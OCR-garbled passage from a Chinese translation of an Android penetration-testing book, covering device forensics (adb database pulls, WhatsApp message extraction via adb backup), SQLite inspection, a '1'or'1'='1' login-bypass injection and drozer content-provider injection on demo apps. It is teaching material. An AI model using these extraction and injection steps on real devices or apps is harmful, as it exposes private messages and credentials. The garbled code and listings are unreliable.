-rwxrwxrwx root root 62 2013-12-27 80 CalllLog Calls.csv 
-rPwxrwxrwx root root 491 2013-12-27 00:15 Contacts Phones.cs\ 
-rPwxrwxrwx root root 204 2013-12-27 00:15 MMS.csv 

-Pwxrwxrwx root root 62 2013-12-27 00:15 MMSParts.csv 
-Pwxrwxrws root root 217 2013-12-27 00 
-rwxrwxrwx root root 61307 2013-12-27 Q00 


SMS. csv 
info.xml 





后 我 们 可 以 在 任何 ,csv 文件 查看 器 中 打开 这 些 ,csv 文件 来 查看 详细 信息 。 因此 ， 


AF Logical 是 一 个 快速 有 效 的 工具 ， 用 于 从 设备 中 提取 一 些 信息 ， 如 联系 人 ， 通 话 记 录 和 消 
Al. o 
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既然 我 们 已 经 看 到 ， 很 多 工具 可 以 帮助 我 们 进行 取证 ， 我 们 还 可 以 使 用 adb 和 我 们 的 手动 技 
能 从 设备 中 提取 一 些 信息 。 正如 我 们 之 前 学 到 的 ， 应 用 程序 文件 和 存储 

在 /data/data/[ 应 用 程序 的 包 名 ]/ 位 置 。 由 于 大 多 数 应 用 程序 也 使 用 数据 库 来 存储 数据 ， 我 们 注 
意 到 在 名 为 directory 的 包 PAAR EA databases 的 文件 夹 。 这 里 需要 注意 的 一 点 是 
这 只 会 帮助 我 们 从 使 用 妆 ae 用 程序 中 提取 信息 ， 以 便 转 储 应 用 程序 和 其 他 相关 信息 

在 某 些 应 用 程序 中 ， 我 们 可 能 还 会 注意 到 ， 应 用 程序 将 数据 存储 在 XML 文件 中 或 使 用 共享 首 
选项 ， 我 们 需要 于 动 审计 它们 。 


Android 使 用 SQLite 数据 库 (我 们 将 在 下 一 章 深 入 讨论 ) 与 .db 文件 格式 。 下面 是 手动 提取 
所 有 数据 库 的 步骤 : 


© 进入 设备 ， 并 创建 一 个 文件 夹 来 存储 所 有 数据 库 
e 查找 所 有 .db 文件 并 将 其 复制 到 创建 的 文件 夹 
e 压缩 文件 夹 并 拉 取 它 


因此 ， 我 们 可 以 使 用 adb shell 查找 /data/data/location 中 的 所 有 数据 库 文件 ， 将 它们 压缩 
到 归档 文件 中 ， 然 后 将 其 拉 取 出 来 。 


1. 在 SD 卡 中 创建 一 个 名 为 BackupDBS 的 文件 夹 。 


2. 为 此 ， 我 们 可 以 简单 地 执行 adb shell ， 然 后 在 /mnt/sdcard 下 创建 一 个 名 
为 BackupDBS 的 文件 夹 : 


adb shell 
mkdir /mnt/sdcard/BackupDBS 


3. 查找 所 有 .db 文件 并 将 其 复制 到 BackuppBs ° 


4. 为 此 ， 我 们 可 以 使 用 一 个 简 单 的 命 a a4 {FT ELK E RAP H Fil /data/data 中 的 所 有 .db Ñ 
件 。 我 们 首先 使 用 find 命令 查找 所 有 .db 文件 。 在 以 下 命令 中 ， 我 们 使 用 find 工 
具 ， 并 指定 从 当前 位 置 搜索 ， 然 后 查找 具有 任何 文件 名 (通配符 * ) 以 及 扩展 名 db 的 
所 有 文件 〈《 即 *.db ) ， 以 及 类 型 为 文件 f 。 


find . -name "*.db" -type f 


下 面 的 截图 展示 了 输出 : 


13@|shell@android:/data/data # find 
android 
./com, 
./com. 
./com, 
./com. 
./com. 


./ com 


./ COM 


./ com 


./ COM. 


./ com. 
./com. 
./com. 
./com, 
com.android 
./com, 
./com., 
android 
./com. 
./com. 


./ com 


./com 


./com 


find . 


android 
android 
android 
android 
android 


android 
android 


android 
android 
android 
android 


android 


android 
android 


android 
android 


到 此 位 置 。 


-name "*.db" -type f -exec 


. -name ‘*,db -type f 


.browser/databases/autofill.db 
.browser/databases/browserz. db 
.browser/databases/webviewCookiesChromium. db 
.browser/databases/webviewCookiesChromiumPrivate. db 
.browser/databases/webview.db 
.browser/app_appcache/App|LicationCache.db 

android. 
./com. 
./com, 
./com. 
android 
./com. 


browser/app_icons/Webpagelcons.db 


.browser/app_databases/Databases.db 
.browser/app_geoLocation/CachedGeoposition.db 
android.providers.calendar/databases/calendar.db 
providers. contacts/databases/profile. db 
.providers.contacts/databases/contacts2.db 
.deskcLock/databases/aLarms.db 
.providers.downloads/databases/downloads.db 
.email/databases/EmailProvider.db 

android. 


emai l/databases/EmailProviderBody. db 


,ematl/databases/Ema1lLProviderBackup.db 
.keychain/databases/grants.db 

. inputmethod. Latin/databases/userbigram_dict.db 
. Launcher/databases/Launcher.db 

.providers .media/databases/externaL.db 
.providers.media/databases/internal.db 
.providers.settings/databases/settings.db 
.noshufou.android.su/databases/su.db 





5， 现 在， 我 们 可 以 简单 地 使 用 cp 和 find ， 以 便 将 其 复制 到 Backuppss 目录 


cp {} /mnt/sdcard/BackupDBS \; 


6， 现 在， 如 果 我 们 查看 /mnt/sdcard 下 的 BackupDBs 目录 ， 我 们 的 所 有 数据 库 都 已 成 功 复制 


shel l@android: /mnt/sdcard/BackupDBS # ls -la 
x root root 22528 2013-12-27 0%:46 ApplicationCache.db 
wx root 0 53248 2013-12-27 00:46 Beryllium.db 
root oot @ 2013-12-27 00:46 CachedGeoposition.db 
@ 2013-12-27 08:46 Databases. db 
102400 2013-12-27 00:46 EmailProvider.db 
102400 2013-12-27 00:46 EmoilProviderBackup.db 
24576 2813-12-27 00:46 EmailProviderBody.db 
16364 2013-12-27 68:46 NewBadge.db 
16384 2013-12-27 00:46 NortonPing.db 
24576 2013-12-27 00:46 Referral .db 
23552 2013-12-27 00:46 Webpagelcons.db 
16384 2013-12-27 00:46 activitylog.db 
16384 2013-12-27 00:46 alarms .db 
16384 2013-12-27 08:46 outofill .db 
331776 2013-12-27 00:46 browser. db 
16384 2013-12-27 00:46 cafecache.db 
122880 2013-12-27 00:46 calendar .db 
32768 2013-12-27 00:46 cfwl.db 
315392 2013-12-27 00:46 contacts2.db 
24576 2013-12-27 00:46 database. db 
24576 2013-12-27 00:46 downloads .db 
20480 2013-12-27 00:46 drozer.db 
172032 2013-12-27 00:46 external ,db 





压缩 并 拉 取 文件 。 现在， 在 同一 位 置 ， 我 们 可 以 使 用 tar 工具 创建 一 个 压缩 包 ， 并 使 
用 adb pull ° 


tar cvf backups.tar BackupDBS/ 


然后 ， 从 系统 中 ， 我 们 可 以 简单 地 像 这 样 拉 取 它 。 此 方法 也 可 以 用 于 通过 
在 /data/app 和 /data/app-private 文件 夹 中 查找 文件 类 型 apk ， 来 从 手机 中 拉 取 所 
有 .apk 文件 z 





如 果 我 们 仔细 看 一 看 ， 在 我 们 的 backups.tar 中 ， 还 有 一 个 名 为 msgstore.db 的 
WhatsApp 应 用 程序 的 数据 库 。 让 我 们 继续 分 析 和 研究 数据 库 内 部 的 内 容 。 为 此 ， 我 们 
需要 首先 解压 我 们 刚才 拉 取 的 tar 归档 文件 。 


tar -xvf backups.tar 


现在 ， 为 了 分 析 名 为 msgstore.db 的 WhatsApp 的 SQLite 数据 库 ， 我 们 可 以 下 载 并 使 用 
任何 SQLite 浏览 器 。 对 于 本 书 ， 我 们 使 用 SQLite RHR WA TU 
从 http://sourceforge.net/projects/sqlitebrowser/ 下 载 。 


. 现在， 如 果 我 们 在 SQLite 数据 库 浏 览 蜂 中 打开 msgstore.db 文件 并 访问 浏览 器 数据 ， 我 
们 可 以 在 SQLite 浏览 器 中 看 到 我 们 的 所 有 WhatsApp 对 话 。 在 以 下 截图 中 ， 我 们 可 以 
看 到 在 SQLite 数据 库 浏览 器 中 打开 的 msgstore.db ， 它 显示 WhatsApp 应 用 程序 的 所 有 


PRAT : 


Eisg Database Browser - [Voume (Aditya Playground i Andrilier ulti) RackupDRS/ migetore db 
Ho me et mie 国 | 
Database Srict ua [Browse Data | Enecute SQL 


Table: messages ! 2, Hes Record Delete Record 


_ 团 key nema | bees Arcee, y_i PU Ite meida pu data Eee Lae meda_url media mirer] 

L -1 ü -1 o 了 ü 

rake Pe ia na 1 130310058 g 下 

3 9195916) 122327728 ü E70360533929 

49198658) 1 138703605 O test JEP OIGO 742 76 

5 9198698: 1 138703605 Qthisisasecretmessage 387036046076 

6 9172051" 1 138703605 They 367036198174 

el 1 3 可 6 Sas o Wha sup TE DJOL 29000 

8 39172051: 0 138643898 a 387096259000 bites :/ mms 87 image/jpeg 
OO1L72051" 1 138704022 O rest 670402609964 
10 91720511 1 138704027 O*><chl>sas $B7040289317 
Ll 91720510 1 138704022 a — JEP O4OD0T E38 hitps:/ /mm 87 image/jpeg 
12 P199674 O 138711785 OoGeed Moming — 187154137000 
13 9199674 O 138730673 0 Be truthful to yourself SEF 327913000 


q 
z 
I 
E] 
5 
é 
7 
L 
a 
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5.7 使 用 logcat 12 Ñ AS 


Android logcat 有 时 在 取证 调查 期 间 很 有 用 。 它 包含 在 电话 以 及 收音 机 上 执行 的 所 有 活动 的 
日 志 。 虽然 不 完整 ， 它 可 以 帮助 调查 员 了 解 设备 中 发 生 了 什么 


为 了 捕获 和 保存 logcat 转 储 文件 ， 我 们 可 以 简单 地 使 用 adb logcat 并 将 输出 保存 到 一 个 文 
件 ， 稍 后 我 们 可 以 分 析 它 

adb logcat > logcat_dump.log 
我 们 还 可 以 使 用 logcat 以 更 加 详细 和 有 用 的 方式 获取 日 志 。 例如， 我 们 可 以 通过 指定 -bp 参 
数 和 radio 来 获取 收音 机 日 志 。 -b 标志 用 于 显示 缓冲 区 (如 收音 机 或 事件 ) 的 logcat。 

-v 标志 用 于 控制 输出 格式 ， 它 代表 verbose (详细 ) ， 也 可 以 


Æ time ， brief ， process °’ tag ” raw °’ threadtime 或 long ° eT -v ， 我 们 还 可 以 
使 用 -a (AR) > -i (信息 ) > -w (F4) 或 -e (错误 ) 。 


adb logcat -v time -b radio -d 


我 们 还 可 以 使 用 其 他 工具 ， 如 dmesg ， 它 将 打印 内 核 消息 ， 以 及 getprop ， 它 将 打印 设备 的 
属性 : 


adb shell getprop 


A ro he ee 了 一 个 应 用 程序 ， 用 于 自动 捕获 来 自 logcat 和 其 他 相关 
来 源 的 信息 息 ， 这 些 信 息 可 以 从 https://code.google.com/p/getlogs/ 下 载 并 使 用 。 


5.8 使 用 备份 功能 来 提取 应 用 数据 


Android 从 4.0 起 引入 了 使 用 adb 的 备份 功能 。 此 功能 可 用 于 创建 应 用 程序 的 备份 及 其 整个 


数据 。 
又 : 


i: 


这 在 取证 上 非 第 有 用 ， 因 为 取证 员 可 以 捕获 应 用 程序 及 其 整个 数据 。 请 参阅 以 下 步 


这 可 以 通过 在 终端 中 执行 adb backup 命 后 面 附 带 应 用 程序 的 所 See Hee See 
A Fe xh le. FF] FB 的 准确 包 名 称 ， ai ， 然 后 过 滤 应 用 程 厅 ER RR 


$ adb shell pm list package | grep 'lastpass' 





package:com. lLastpass.lpandroid 


执行 此 操作 的 另 一 种 方法 是 使 用 pm list package 命令 其 中 -f 标志 指定 要 在 包 和 名称 中 
查找 的 字符 串 。 


$ adb shell pm list package -f lastpass 


package: /data/app/com. Lastpass. Lpandroid-1.apk=com. Lastpass.lLpandroid 
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adb backup [package name] -f [destination file name] 


目标 文件 将 以 文件 扩展 名 .ab (Android 备份 ) 存储 。 在 这 里 ， 我 们 采集 了 WhatsApp 
应 用 程序 的 备份 。 


$ adb backup com.whatsapp -f whatsapp_backup.ab 





Now unlock your device and confirm the backup operation. 


—-BRNBAT PS > CHM HERREZEN > PP ONRAM ST : 


@! Full backup 


A full backup of all data to a connected 
desktop computer has been requested. Do 
yO U YN a i | | () ct | () YA [ | S [ O i j a D p e | 1? 


Ift you did not request the backup yourself, do 
not allow the operation to proceed. 


If you wish to encrypt the full backup data, 
enter a password below: 


Do not backup Back up my data 





6. 在 这 里 ， 我 们 需要 选择 Back up my data (备份 我 的 数据 ) 选项 ， 并 且 还 可 以 为 备份 指定 
加 禹 赞 码 。 一 旦 备份 过 程 完成 ， 我 们 将 获得 whatsapp_backup.ab 文件 。 
7. 接 下 来 ， 我 们 需要 解压 此 备份 ， 以 便 从 .ab 文件 获取 数据 库 。 为 此 ， 我 们 将 使 

用 dd 和 openssl 创建 一 个 ,tar 文件 ， 然 后 我 们 可 以 解压 它 。 


$ dd if=whatsapp_backup.ab bs=24 skip=1 | openssl zlib -d > whatsapp. tar 
3460+1 records in 


3460+1 records out 
83062 bytes transferred in 0.031047 secs (2675354 bytes/sec) 





8. 现在 ， 由 于 我 们 获得 了 .tar 文件 ， 我 们 可 以 使 用 tar xvf 简单 解压 它 。 


$ tar xvf whatsapp.tar 


apps/com 
apps/com 
apps/com 
apps/com 
apps/com 


apps/com. 
.whatsapp/f/pw 


apps/com 


apps/com. 
.whatsapp/f/me 
.whatsapp/f/Avatars 


apps/com 
apps/com 


apps/com. 
apps/com. 
.whatsapp/f/MessageService.pid 
apps/com. 
.whatsapp/f/sync_backoff 

.whatsapp/f/wastats. timestamp 


apps/com 


apps/com 
apps/com 


.whatsapp/_manifest 
.whatsapp/r/app_Keys 

.whatsapp/f/Logs 
.whatsapp/t/Logs/whatsapp-2013-12-27.1 
.whatsapp/f/Logs/whatsapp. Log 


whatsapp/f/wastats. Log 
whatsapp/f/expiration_date 
whatsapp/f/Avatars/917205163883@s.wha 
whatsapp/f/Avatars/919967420743@s.wha 


whatsapp/f/account_type 


m.whatsapp/f/full_sync_wait 
m.whatsapp/f/fullsync.dat 


.whatsapp/f/.trash 


m.whatsapp/f/statistics 





一 旦 它 解 压 完 成 ， 我 们 可 以 访问 apps/[package-name] 下 的 db 文件 夹 ， 来 获取 数据 库 。 
XE > FZ AL ZARA com.whatsapp ° 


让 我 们 快速 使 用 ls -1 来 查看 db 文件 夹 中 的 所 有 可 用 文件 。 正如 你 可 以 看 到 的 ， 我 们 拥 
有 msgstore.db 文件 ， 它 包含 WhatsApp 对 话 ， 我 们 已 经 在 上 一 节 中 看 到 了 。 


odityogupta 


1 adityagupta 


1 adityogupta 
=- 1 odityagupte 
1 adityagupta 
1 adityagupta 
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at Mothbook Fro ify ee 


H Te as aT EG tats 


admin 49152 Dec 27 07:01 magstore.db 

admin 8720 Dec 27 07:01 msgstore.db- journal 
admin 28672 Dec 2? 07:01 wo.db 

admin 32768 Dec 27 07:01 wo.db-shm 

admin @ Dec 27 07:01 wo.db-wal 





在 本 章 中 ， 我 们 分 析 了 执行 取证 的 不 同方 法 ， 以 及 各 种 工具 ， 我 们 可 以 使 用 它们 来 帮助 我 们 
进行 取证 调查 。 此 外 ， 我 们 了 解 了 一 些 我 们 可 以 执行 的 手动 方法 ， 来 从 设备 中 提取 数据 。 


在 下 一 章 中 ， 我 们 将 深入 SQLite 数据 库 ， 这 是 Android 渗透 测试 的 另 一 个 要 素 。 


第 五 草 Android 取证 
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第 六 草 玩 转 SQLite 


作者 : Aditya Gupta 
译 者 : 飞龙 
It : CC BY-NC-SA 4.0 


SQLite 是 一 个 开源 数据 库 ， 具 有 许多 类 似 于 其 他 关系 数据 库 (如 SQL) 的 功能 。 如 果 你 是 

用 程序 开发 人 员 ， 你 可 能 还 会 注意 到 SQLite 查询 看 起 来 或 多 或 少 像 SQL 一 样 。 在 Android 

中 选择 SQLite 的 原因 是 其 内 存 占 用 较 低 。 Android 开发 者 喜欢 SQLite 的 原因 是 它 不 需要 设 
置 或 配置 数据 库 ， 并 且 可 以 在 应 用 程序 中 直接 调用 。 


6.1 深入 理解 SQLite 


正如 我 们 在 上 一 章 中 看 到 的 ，SQLite 数据 库 默 认 在 Android 中 存储 

在 /data/data/[package name]/databases/ 人 位置， 扩展 名 为 .db 文件 (Æ Android 的 大 多 数 情 
况 下 ) 。 现在 ， 在 我 们 更 深入 地 探讨 SQLite 漏洞 之 前 ， 我 们 应 该 清楚 地 了 解 SQLite 语句 和 
一 些 基本 的 命令 


分 析 使 用 SQLite 的 简单 应 用 


在 这 里 ， 我 们 有 一 个 基本 的 Android 应 用 程序 ， 它 支持 用 户 的 登录 和 注册 ， 并 在 后 3 
SQLite。 遵循 以 下 步骤 : 


1. 让 我 们 运行 应 用 程序 并 分 析 它 创建 的 数据 库 。 你 可 以 
从 http://attify.com/lpfa/vulnsqlite.apk 下 载 漏洞 应 用 程序 。 用 于 创建 数据 库 的 代码 示 
例如 以 下 屏幕 截图 所 示 : 


public weld eaters ee aeara database} { 
String createTableSgi = “CREATE TABLE “ + tebleWome + " (T + id 4 HTEGER HOT WULL PRIMARY KEY, "T è FirstName + 
+ Lost tWome + " TEXT. = i + = TEXT, = + pheompeNomber + ~ TEXT, ~ + WFP + * TEXT, = + possword + MT)": 


Log.d{"ontreate()", createTabl Sin 
dutwhace. execSOL i createTahlesoOn y 





2. 这 意味 着 我 们 有 七 个 字段 ， 名 称 为 id (integer ), firstName ( text ), lastName 
( text ), email ( text ), phoneNumber ( text ), username ( text ), 和 password 


( text )° tablename 字段 之 前 叫做 USER_RECORDS ° 


3. 让 我 们 现在 访问 adb shell 并 检查 数据 库 。 我 们 可 以 使 用 SQLite 浏览 器 访问 SQLite X 
件 ， 我 们 在 上 一 草 中 使 用 了 它 ， 或 者 我 们 可 以 使 用 命令 行 工 具 sqlite3 。 对 于 整个 这 一 
草 ， 我 们 将 使 用 名 为 sqlite3 的 命令 行 工具 ， 它 存在 于 大 多 数 Android 设 备 中 。 
的 Android 设备 中 不 存在 它 ， 你 可 以 使 用 Play 商店 中 提供 的 BusyBox 应 用 程序 进行 安 


J+ 
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所以， 让 我 们 继续 分 析 数 据 库 。 我 们 需要 做 的 第 一 件 事 是 使 用 adb shell 进入 设备 。 


下 一 步 是 访 le] /data/data/[package-name] 目 录 的 位 置 并 查找 databases 文件 来 。 一 旦 我 
们 进入 了 数据 库 文件 夹 ， 我 们 会 注意 到 各 种 文件 。 现 在 ，SQLite 数据 库 的 文件 格式 大 多 
是 前 面 提 到 的 .db ， 但 它们 也 可 以 为 .sqlite ， .sqlitedb 或 开发 人 员 在 创建 应 用 程序 
时 指定 的 任何 其 他 扩展 名 。 如 果 你 记得 上 一 章 中 的 练习 ， 在 查找 数据 库 文件 时 ， 这 正 是 
寻找 其 他 扩展 名 的 时 候 ， 例 如 .sqlite ° 


， 现 在， 我 们 可 以 使 用 以 下 命令 使 用 sqlite3 打开 数据 库 : 


sqlite3 [databasename] 


在 这 种 情况 下 ， 由 于 数据 库 名 称 是 weak-db ， 我 们 可 以 简单 地 输 

入 sqlite3 vulnerable-db 打开 它 。 我 们 也 可 以 在 给 定时 间 使 用 sqlite3 打开 多 个 数据 
库 。 要 查看 加 载 的 当前 数据 库 ， 我 们 可 以 键入 .databases 命令 列 出 我 们 当前 的 数据 库 ， 
如 下 面 的 截图 所 示 : 





. 现在， 我 们 打开 数据 库 时 要 做 的 第 一 件 事 是 查看 数据 库 中 包含 的 表 。 表 的 列表 可 以 
由 .tables 显示 ， 如 以 下 屏幕 截图 所 示 : 





正如 我 们 在 这 里 可 以 看 到 的 ， 有 两 个 名 称 为 USER_RECORDS 和 android metadata 的 表 。 由 
于 我 们 对 USER_RECORDS 更 感 兴 趣 ， 我 们 将 首先 继续 查看 表 中 的 各 个 列 ， 稍 后 我 们 将 转 储 
列 字 段 中 的 数据 。 为 了 查看 有 关 表 的 更 多 信息 ， 例 如 列 字 段 ， 我 们 可 以 使 用 .schema 命 
令 ， 如 下 面 的 截图 所 示 : 


sqlite> .schema USER_RECORDS 


CREATE TABLE USER_RECORDS (ID INTEGER MOT HULL PRIMARY KEY, FIRST_NAME TEXT, LAST_MAME TEXT, EMAIL TEXT, PHON 
E_WUMBER TEXT, USERNAME TEXT 


， 接 下 来 我 们 需要 做 的 是 通过 执行 SELECT 查询 来 查看 列 字段 中 的 数据 。 





另 一 个 需要 注意 的 重要 事情 是 ，SQL 中 使 用 的 大 多 数 查询 对 SQLite 仍然 有 效 。 


.使 用 应 用 程序 并 为 数据 库 填 充 一 些 信 息 。 接 下 来 ， 为 了 查询 并 查看 USER_RECORDS 表 ， 通 
过 通配符 * 指定 所 有 内 容 ， 我 们 可 以 使 用 以 下 命令 


SELECT * from USER_RECORDS; 


运行 上 述 命 令 将 产生 类 似 于 如 下 所 示 的 输出 : 


sqlite> select * from USER_RECORDS:; 
1/ Aditya! Guptaladi@attify.com!| 12345678901 adityalmysecretpassword 





2|Secret|User|lsecret@attify.com!555555590/ secretuser | password123 


现在 > sqlite3 也 给 了 我 们 改变 输出 格式 查看 额 外 信息 以 及 所 需 信 息 的 É] H o 所 以 
让 我 们 继续 ， 将 查看 mode HAA column ， 将 header 设置 为 on 。 


10. 让 我 们 再 次 运行 相同 的 查询 并 检查 输出 ， 如 下 面 的 截图 所 示 : 


sglites select * from USER_RECORDS: 
FIRST_NAME LAST_NAME EMATL PHONE NUMBER USERNAME PASSWORD 


Aditya adi@atti fy. com 1234567890 aditya 有 和 
Secret js secret@attify. 555555590 secretuser passwordi73 


还 有 其 他 可 用 的 选项 可 用 于 渗透 测试 。 其 中 之 一 是 .output 命令 。 这 会 自动 将 之 后 的 

SQL 查询 的 输出 保存 到 指定 的 文件 ， Maes ， 而 不 是 在 屏幕 上 显示 。 一 旦 我 

们 将 输出 保存 在 文件 中 ， 并 且 想 返回 屏幕 显示 模式 ， 我 们 可 以 使 用 .output 命令 并 将 其 
置 为 stdout ， 这 将 再 次 在 终端 上 显示 输 





在 SQLite 中 ， .dump 将 创建 一 个 列表 ， 包 人 钨 从 数据 库 创 建 到 现在 为 止 所 执行 的 所 有 SQL 
操作 。 以 下 是 在 当前 数据 库 上 运行 的 命令 的 输出 的 屏幕 截图 : 


sglite> .dump 

PRAGMA foreign _keys=0FF; 

BEGIN TRANSACTION: 

REATE TABLE android metadata (locale TEXT); 

NSERT INTO “ondroid_metadata” VALUES( "en_US" Y; 

REATE TABLE USER_RECORDS CID INTEGER NOT NULL PRIMARY KEY, FIRST_NAME TEXT, LAST_ MAME TEXT, EMAIL TEXT, PHON 
_MUMBER TEXT, USERNAME TEXT, PASSWORD TEXT): 

INSERT INTO “USER_RECORDS” VALUES(C1, ‘Aditya’, "Gupta, ‘adiBattify. com’ , "1234567890" , aditya' , "mysecretpassword 
J 

INSERT INTO “USER-RECORDS" VALUES(2, "Secret", "User", 'secretBottify. cos", "555555590" , ‘secretuser' ,"password123 
“Di 

COMMIT; 





此 外 ， 所 有 这 些 操作 都 可 以 从 终端 执行 ， 而 不 是 进入 shell? AGRA sqlite3 二 进 制 。 
我 们 可 以 直接 向 adb shell 传递 我 们 的 命令 并 获得 输出 ， 如 下 面 的 截图 所 示 : 


§ adb shell sqlite3 -columan -header /dotea/data/com.attify.sqliteapp/datebases/vulnerable-db ‘select * from US 


FIRST_NAME LAST_NAME EMAIL PHONE MUMBER USERNAME PASSWORD 


Aditya Gupta adi€ottify. com 1234567590 SEEREN 
Secret User secret@attify. 555555990 gecretuser passwordi23 
User secret@attify. 555555590 1 passwordi24 





6.2 ARF 


Web 应 用 程序 和 移动 应 用 程序 中 最 第 见 的 漏洞 之 一 是 基于 注入 的 漏洞 。 如 果 按 原样 使 用 用 户 
提供 的 输入 ， 或 动态 SQL 查询 的 保护 很 少 并 且 不 足够 ，SQLite 也 会 产生 注入 漏洞 。 


让 我 们 来 看 看 用 于 查询 应 用 程序 中 的 数据 的 SQL 查询 ， 如 下 所 示 : 


String getSQL = "SELECT * FROM " + tableName + ”WHERE " + 
username + " = '" + uname + "' AND " + password + " = '" + pword + 


I 
Cursor cursor = dataBase.rawQuery(getSQL , null 


在 前 面 的 SQL 查询 中 ， uname 和 pword 字段 从 用 户 输入 直接 传递 到 SQL 查询 中 ， 然 后 使 
用 rawQuery 方法 执行 。 rawQuery 方法 实际 上 只 是 执行 任何 传递 给 它 的 SQL 查询 。 另 一 个 类 
似 于 rawQuery 的 方法 是 execSQL 方法 ， 它 和 rawQuery 一 样 脆弱 。 


前 面 的 SQL 查询 用 于 验证 用 户 的 登录 凭据 ， 然 后 其 在 注册 期 间 使 用 的 人 信息。 所以， 这 里 
的 SQL 引擎 检查 用 户 名 和 客 码 是 否 匹 配 在 一 行 ， ees 文 样 ， 它 返回 一 个 布尔 值 TRUE ° 


然而 ， 想 象 一 个 场景 ， 我 们 可 以 修改 我 们 的 输入 ， 而 不 是 正常 的 文本 输入 ， 它 似乎 是 应 用 程 
序 的 SQL 查询 的 一 部 分 ， 然 后 又 返回 TRUE ， 从 而 授予 我 们 身份 。 事 实证 明 ， 如 果 我 们 把 用 
户 名 /密码 设 为 1'or'1'='1 或 任何 类 似 总 是 TRUE 的 查询 ， 我 们 就 破解 了 应 用 程序 的 身份 验证 
机 制 ， 这 反 过 来 是 一 个 很 大 的 安全 风险 。 另 外 ， 请 注意 ， 由 于 使 用 单 引 号 ， 在 前 面 输入 中 使 
用 的 OR 将 在 SQL 和 查询 中 被 视 为 OR 。 这 将 闭合 用 户 名 字段 ， 并 且 我 们 的 其 余 输 入 将 解释 为 
SQL 查询 。 你 可 以 从 http://attify.com/lpfa/sqlite.apk 下 载 漏洞 应 用 程序 。 这 里 是 攻击 情 
况 下 的 SQL 查询 : 


SELECT * FROM USER_RECORDS WHERE USERNAME = '1'or'1'='1' AND 
PASSWORD = 'something' 


aa 用 程序 检测 到 登录 成 功 ， 它 会 显示 一 个 弹出 框 ， 其 中 包含 用 户 信 息 ， 就 像 在 SQLite 身 
份 验 十 绕 过 攻击 的 情况 下 一 样 ， 如 下 面 的 屏幕 截图 所 示 : 


User Detalls 





我 们 还 可 以 在 输入 结尾 处 附加 双 连 字符 ( - ) ， 来 使 SQL 查询 的 其 余部 分 仅 解释 为 对 应 用 程 
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让 我 们 看 看 另 一 个 应 用 程序 ， 这 一 次 ， 利 用 drozer， 我 们 以 前 使 用 的 工具 ， 来 利用 SQLite 注 
入 漏洞 。 


这 个 应 用 程序 是 一 个 待 办 事项 ， 用 户 可 以 保存 他 们 的 笔记 ; 该 笔记 存储 在 名 为 todotable.db 的 
数据 库 中 ， 并 在 应 用 程序 中 通过 内 容 供应 器 访问 。 遵循 以 下 步骤 : 


1， 让 我 们 继续 ， 并 局 动 drozer， 查 看 这 个 应 用 程序 的 数据 库 ， 如 下 面 的 命令 所 示 。 软 件 包 
名 称 为 com. attify.vulnsqliteapp ° 


adb forward tcp:31415 tcp:31415 
drozer console connect 


2. 一 旦 我 们 进入 了 Drozer 的 控制 台 ， 我 们 就 可 以 运行 finduri 扫描 器 模块 来 查看 所 有 内 容 
URI 和 可 访问 的 URI， 如 下 所 示 : 


dz> run scanner.provider.finduris -a com.attify.vulnsqliteapp 
Scanning com.attify.vulnsqliteapp... 


Unable to Query 
content://com.attify.vulnsqliteapp.contentprovider/ 


Able to Query 
content://com.attify.vulnsqliteapp.contentprovider/todos 


Able to Query 
content://com.attify.vulnsqliteapp.contentprovider/todos/ 


Unable to Query 
content://com.attify.vulnsqliteapp.contentprovider 


Accessible content URIs: 
content://com.attify.vulnsqliteapp.contentprovider/todos 
content://com.attify.vulnsqliteapp.contentprovider/todos/ 


3， 接 下 来 ， 我 们 将 使 用 Drozer 中 的 注入 扫描 程序 模块 检查 应 用 程序 中 基于 注入 的 漏洞 ， 如 
下 所 示 : 


dz> run scanner.provider.injection -a com.attify.vulnsgliteapp 

Scanning com.attify.vulnsqliteapp... 

Not Vulnerable: 
content://com.attify.vulnsgliteapp.contentprovider/ 
content://com.attify.vulnsqliteapp.contentprovider 


Injection in Projection: 
No vulnerabilities found. 


Injection in Selection: 
content://com.attify.vulnsqliteapp.contentprovider/todos 
content://com.attify.vulnsqliteapp.contentprovider/todos/ 


4 所以， 现在 我 们 可 以 使 用 可 选 参 数 来 查询 这 些 内 容 供 应 器 ， 例 如 1=1， 它 将 在 所 有 情 
况 下 返回 TRUE ， 如 下 面 的 截图 所 示 : 


dz> run app.provider.query content://com.attify.vulnsqliteapp.contentprovider/to 
dos/ --selection "1=1" 

_id | category | summary | description | 

1 | Urgent | Meeting with the boss | Meeting room no LR3 | 

2 | Urgent | Financial Summary | Submit annual report | 





5. 此 外 我 们 可 以 使 用 Drozer 模块 app.provider.insert ?’ 并 通过 指定 参数 和 要 更 新 的 数 
据 类 型 ， 将 我 们 自己 的 数据 插入 SQLite 数据 库 。 让 我 们 假设 我 们 要 在 数据 库 中 添加 另 一 
to-do 条 目 。 因此， 我 们 需要 四 个 字 


段 : id ， category ?’ summary 和 description ? 数据 类 型 分 别 


为 integer ’ string ’ string 和 string ° 


6，、 因 此， 完整 的 语法 将 变 成 : 


run app.provider.insert 
content://com.attify.vulnsqliteapp.contentprovider/todos/ - 
-integer _id 2 --string category urgent --string summary 
"Financial Summary" --string description "Submit Annual 
Report" 


成 功 执行 后 ， 它 将 显示 完成 消息 ， 如 以 下 屏幕 截图 所 示 : 


dz» run app.provider. insert content: //com.attify.vulnsgliteapp. contentprovider/todos/ -—-integer _id 2 = 
-string category Urgent —string summary “Financial Summary" —string description “Submit annual report 
1 
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在 本 章 中 ， 我 们 深入 了 解 了 SQLite 数据 库 ， 甚 至 在 应 用 程序 中 发 现 了 漏洞 ， 并 利用 Drozer 
来 利用 它们 。 SQLite 数据 库 应 该 是 渗透 测试 人 员 关 注 的 主要 问题 之 一 ， 因 为 它们 包含 了 应 用 
程序 的 大 量 信 息 。 在 接 下 来 的 章节 中 ， 我 们 将 了 解 一 些 不 太 知 名 的 Android 利用 技术 。 


第 七 章 不 太 知 名 的 Android 漏洞 


作者 : Aditya Gupta 
译 者 : 飞龙 
Wil : CC BY-NC-SA 4.0 


在 本 草 中 ， ne 了 解 一 些 不 太 知 名 的 Android 攻击 向 量 ， 这 在 Android 渗透 测试 中 可 能 很 
有 用 。 我 们 还 将 涵 2 em > 如 Android 广告 库 中 的 漏洞 和 webview 实现 中 的 漏洞 。 作为 
i CAA ， 并 发 现 一 些 不 常见 的 缺 


陷 。 


7.1 Android WebView “174 


WebView 是 一 种 Android 视图 ， 用 于 在 应 用 程序 中 显示 Web 内 容 。 它 使 用 WebKit 泻 染 引 
